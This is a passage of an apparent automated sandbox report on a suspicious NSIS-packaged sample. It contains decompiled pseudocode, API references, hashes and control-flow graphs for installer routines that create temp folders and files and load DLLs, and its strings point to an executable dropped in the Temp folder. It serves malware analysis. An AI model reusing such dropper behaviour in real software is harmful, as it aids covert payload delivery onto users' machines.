						__eflags =  *0x42a2e8;
						goto L32;
					} else {
						E00406668(0x40b5f8, _t83);
						E00406668(_t83, _t81);
						E004066A5(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406668(_t83, 0x40b5f8);
						_t64 = E00405CC8("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056CA();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056CA(0xffffffea,  *(_t86 - 8));
				 *0x42a314 =  *0x42a314 + 1;
				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x42a314 =  *0x42a314 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CC8();
					goto L29;
				}
				goto L33;
			}


















                                                                                              0x0040176f
                                                                                              0x00401776
                                                                                              0x00401782
                                                                                              0x00401785
                                                                                              0x0040178a
                                                                                              0x0040178d
                                                                                              0x00401794
                                                                                              0x004017b0
                                                                                              0x00401796
                                                                                              0x00401797
                                                                                              0x00401797
                                                                                              0x004017b6
                                                                                              0x004017bb
                                                                                              0x004017bb
                                                                                              0x004017bf
                                                                                              0x004017c2
                                                                                              0x004017c7
                                                                                              0x004017c9
                                                                                              0x004017cb
                                                                                              0x004017d0
                                                                                              0x004017d0
                                                                                              0x004017db
                                                                                              0x004017db
                                                                                              0x004017ec
                                                                                              0x004017ee
                                                                                              0x004017ee
                                                                                              0x004017ef
                                                                                              0x004017ef
                                                                                              0x004017f2
                                                                                              0x004017f5
                                                                                              0x004017f8
                                                                                              0x004017f8
                                                                                              0x004017ff
                                                                                              0x0040180e
                                                                                              0x00401813
                                                                                              0x00401816
                                                                                              0x00401819
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040181b
                                                                                              0x0040181e
                                                                                              0x00401874
                                                                                              0x00401879
                                                                                              0x004015b6
                                                                                              0x0040292e
                                                                                              0x0040292e
                                                                                              0x00402c2a
                                                                                              0x00402c2d
                                                                                              0x00402c2d
                                                                                              0x00000000
                                                                                              0x00401820
                                                                                              0x00401826
                                                                                              0x0040182d
                                                                                              0x0040183a
                                                                                              0x00401845
                                                                                              0x0040185b
                                                                                              0x0040185b
                                                                                              0x0040185e
                                                                                              0x00000000
                                                                                              0x00401864
                                                                                              0x00401864
                                                                                              0x00401865
                                                                                              0x00401882
                                                                                              0x00402c33
                                                                                              0x00402c33
                                                                                              0x00402c33
                                                                                              0x00401867
                                                                                              0x00401867
                                                                                              0x00401868
                                                                                              0x00401493
                                                                                              0x0040239d
                                                                                              0x0040239d
                                                                                              0x0040239d
                                                                                              0x00401865
                                                                                              0x0040185e
                                                                                              0x00402c35
                                                                                              0x00402c39
                                                                                              0x00402c39
                                                                                              0x00401892
                                                                                              0x00401897
                                                                                              0x004018a5
                                                                                              0x004018aa
                                                                                              0x004018b0
                                                                                              0x004018b4
                                                                                              0x004018b6
                                                                                              0x004018be
                                                                                              0x004018ca
                                                                                              0x004018b8
                                                                                              0x004018b8
                                                                                              0x004018bc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004018bc
                                                                                              0x004018d3
                                                                                              0x004018d9
                                                                                              0x004018db
                                                                                              0x00000000
                                                                                              0x004018e1
                                                                                              0x004018e1
                                                                                              0x004018e4
                                                                                              0x004018fc
                                                                                              0x004018e6
                                                                                              0x004018e9
                                                                                              0x004018f2
                                                                                              0x004018f2
                                                                                              0x00401901
                                                                                              0x00401906
                                                                                              0x00402398
                                                                                              0x00000000
                                                                                              0x00402398
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                              • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,00000000,00000000,"C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                              • String ID: "C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe" C:\Users\user\AppData\Local\Temp\bzuxwizqdxf.m$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                                                              • API String ID: 1941528284-277419503
                                                                                              • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                              • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                              • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                              • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                                                              C-Code - Quality: 100%
                                                                                              			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                              0x004069dc
                                                                                              0x004069e5
                                                                                              0x004069e7
                                                                                              0x004069e7
                                                                                              0x004069eb
                                                                                              0x004069fe
                                                                                              0x004069f8
                                                                                              0x004069f8
                                                                                              0x004069f8
                                                                                              0x00406a17
                                                                                              0x00406a2b
                                                                                              0x00406a32

                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                              • wsprintfW.USER32 ref: 00406A17
                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                              • API String ID: 2200240437-1946221925
                                                                                              • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                              • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                              • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                              • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                              0x00405ba4
                                                                                              0x00405ba8
                                                                                              0x00405bab
                                                                                              0x00405bb1
                                                                                              0x00405bb5
                                                                                              0x00405bb9
                                                                                              0x00405bc1
                                                                                              0x00405bc8
                                                                                              0x00405bce
                                                                                              0x00405bd5
                                                                                              0x00405bdc
                                                                                              0x00405be4
                                                                                              0x00405be6
                                                                                              0x00000000
                                                                                              0x00405be6
                                                                                              0x00405bf0
                                                                                              0x00405bf7
                                                                                              0x00405c0d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405c0f
                                                                                              0x00405c13

                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                              • GetLastError.KERNEL32 ref: 00405BF0
                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                              • GetLastError.KERNEL32 ref: 00405C0F
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 3449924974-3081826266
                                                                                              • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                              • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                              • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                              • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 538 406187-406193 539 406194-4061c8 GetTickCount GetTempFileNameW 538->539 540 4061d7-4061d9 539->540 541 4061ca-4061cc 539->541 543 4061d1-4061d4 540->543 541->539 542 4061ce 541->542 542->543
                                                                                              C-Code - Quality: 100%
                                                                                              			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                              0x0040618d
                                                                                              0x00406193
                                                                                              0x00406194
                                                                                              0x00406194
                                                                                              0x00406199
                                                                                              0x0040619a
                                                                                              0x0040619d
                                                                                              0x004061a2
                                                                                              0x004061a5
                                                                                              0x004061af
                                                                                              0x004061bc
                                                                                              0x004061c0
                                                                                              0x004061c8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004061cc
                                                                                              0x00000000
                                                                                              0x004061ce
                                                                                              0x004061ce
                                                                                              0x004061ce
                                                                                              0x004061d1
                                                                                              0x004061d4
                                                                                              0x004061d4
                                                                                              0x004061d7
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 004061A5
                                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                              • API String ID: 1716503409-678247507
                                                                                              • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                              • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                              • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                              • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 544 403c25-403c34 545 403c40-403c48 544->545 546 403c36-403c39 CloseHandle 544->546 547 403c54-403c60 call 403c82 call 405d74 545->547 548 403c4a-403c4d CloseHandle 545->548 546->545 552 403c65-403c66 547->552 548->547
                                                                                              C-Code - Quality: 100%
                                                                                              			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsjF9DD.tmp\\", 7); // executed
				return _t4;
			}







                                                                                              0x00403c25
                                                                                              0x00403c34
                                                                                              0x00403c37
                                                                                              0x00403c39
                                                                                              0x00403c39
                                                                                              0x00403c40
                                                                                              0x00403c48
                                                                                              0x00403c4b
                                                                                              0x00403c4d
                                                                                              0x00403c4d
                                                                                              0x00403c4d
                                                                                              0x00403c54
                                                                                              0x00403c60
                                                                                              0x00403c66

                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                              • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\nsjF9DD.tmp\, xrefs: 00403C5B
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsjF9DD.tmp\
                                                                                              • API String ID: 2962429428-471886703
                                                                                              • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                              • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                              • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                              • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 636 4015c1-4015d5 call 402da6 call 405fe2 641 401631-401634 636->641 642 4015d7-4015ea call 405f64 636->642 643 401663-4022f6 call 401423 641->643 644 401636-401655 call 401423 call 406668 SetCurrentDirectoryW 641->644 649 401604-401607 call 405c16 642->649 650 4015ec-4015ef 642->650 660 402c2a-402c39 643->660 661 40292e-402935 643->661 644->660 663 40165b-40165e 644->663 659 40160c-40160e 649->659 650->649 653 4015f1-4015f8 call 405c33 650->653 653->649 667 4015fa-4015fd call 405b99 653->667 665 401610-401615 659->665 666 401627-40162f 659->666 661->660 663->660 669 401624 665->669 670 401617-401622 GetFileAttributesW 665->670 666->641 666->642 672 401602 667->672 669->666 670->666 670->669 672->659
                                                                                              C-Code - Quality: 86%
                                                                                              			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE2(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F64(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C16( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C33(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B99( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406668(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                                                              0x004015c1
                                                                                              0x004015c9
                                                                                              0x004015cc
                                                                                              0x004015d1
                                                                                              0x004015d5
                                                                                              0x004015d7
                                                                                              0x004015df
                                                                                              0x004015e1
                                                                                              0x004015e4
                                                                                              0x004015ea
                                                                                              0x00401604
                                                                                              0x00401607
                                                                                              0x004015ec
                                                                                              0x004015ec
                                                                                              0x004015ef
                                                                                              0x00000000
                                                                                              0x004015fa
                                                                                              0x004015fd
                                                                                              0x004015fd
                                                                                              0x004015ef
                                                                                              0x0040160e
                                                                                              0x00401615
                                                                                              0x00401624
                                                                                              0x00401624
                                                                                              0x00401617
                                                                                              0x0040161a
                                                                                              0x00401622
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401622
                                                                                              0x00401615
                                                                                              0x00401627
                                                                                              0x0040162b
                                                                                              0x0040162c
                                                                                              0x004015d7
                                                                                              0x00401634
                                                                                              0x00401663
                                                                                              0x004022f1
                                                                                              0x00401636
                                                                                              0x00401638
                                                                                              0x00401645
                                                                                              0x0040164d
                                                                                              0x00401655
                                                                                              0x0040165b
                                                                                              0x0040165b
                                                                                              0x00401655
                                                                                              0x00402c2d
                                                                                              0x00402c39

                                                                                              APIs
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                • Part of subcall function 00405B99: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                                                                              Memory Dump Source
